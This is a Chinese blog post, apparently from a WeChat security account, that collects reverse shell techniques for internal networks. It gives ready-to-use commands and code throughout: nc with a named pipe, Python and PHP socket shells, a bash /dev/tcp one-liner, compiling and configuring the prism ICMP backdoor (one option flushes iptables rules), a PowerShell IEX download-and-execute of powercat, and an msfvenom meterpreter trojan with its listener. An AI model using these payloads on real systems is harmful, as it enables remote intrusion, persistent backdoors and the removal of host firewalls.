其他
常用内网反弹shell方法一览
本次整理了一些常用的反弹shell手段,供各位参考。
在linux下的nc中我们使用-e来反弹shell的时候会发现不存在-e参数。
在这种情况下可以通过创建管道,然后将默认shell环境的输入重定向给刚才创建的管道,最后将输出重定向到管道中。
mknod /tmp/bmz p
/bin/bash 0</tmp/bmz | nc 192.168.88.131 1234 1>/tmp/bmz
我们已经可以接收到反弹的shell
import socket,subprocess,os
s =socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(( "192.168.88.131" , 1234 ))
os.dup2(s.fileno(), 0 )
os.dup2(s.fileno(), 1 )
os.dup2(s.fileno(), 2 )
p = subprocess.call([ "/bin/bash" , "-i" ])
运行即可接收到shellbash -i >& /dev/tcp/ip_address/port 0>&1
如果目标对流量协议进行了限制,也可以尝试采用ICMP协议进行反弹shell。因为通常情况下不会对ICMP协议进行封禁。
首先下载prism(公众号首页回复:“prism”获取下载地址)
下载完后会有这几个文件
其中prism.c是我们需要编译的后门文件,sendPacket.py用来触发后门,但是后门文件在我们编译前需要进行一下配置。
重点关注这几行
其中
define REVERSE_HOST用来设置监听主机的IP地址
define REVERSE_PORT用来设置监听的端口
设置好以后上传到目标主机进行编译
编译的命令:
gcc <..OPTIONS..> -Wall -s -o prism prism.c
其中OPTIONS包含以下选项
-DDETACH //后台运行
-DSTATIC //只用STATIC模式(默认是ICMP模式)
-DNORENAME //不再重命名进程名
-DIPTABLES //清除所有iptables规则表项
使用
gcc -DDETACH -Wall -s -o prism prism.c
编译后门
之后运行编译好的后门文件。
然后去运行
这个时候去运行我们的sendPacket.py
监听主机便会获取到反弹的shell
powershell IEX (New-ObjectSystem.Net.Webclient).DownloadString('http://192.168.1.38/powercat.ps1');
powercat -c ip_addr -p port -e cmd
msfvenom -p windows/meterpreter/reverse_tcp LHOST=195.1.7.23 LPORT=8888 -f exe > shell.exe
生成木马后使用exploit/multi/handler模块监听,选择对应后门的payload,配置好参数后开启监听。在目标服务器运行生成的后门文件后就可以上线。php -r '$sock=fsockopen("192.168.1.38",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
欢迎 在看丨留言丨分享至朋友圈 三连
好文推荐
实战杀猪盘渗透测试
三款windows下图形化应急响应工具 (附下载地址)
Nessus最新插件包20220925(附下载地址)
实战|一次不太成功的反诈骗渗透测试 CTF常用脚本工具(附下载地址) 实战|一次对BC网站的渗透测试 实战|文件上传绕过的一次思路总结学习(两个上传点组合Getshell) AppScan10.0.8(附下载地址) BurpSuite_pro_v2022.8(附下载地址) 一款强大的红队资产测绘工具 红队必备-防蜜罐抓到被打断腿 HVV之内存马检测工具 HVV中一种针对红队的新型溯源手段 HVV|蓝队防猝死手册 蓝队/红队钓鱼项目(附分析报告) 红队防猝死手册 干货|红队全流程学习资料(附下载地址)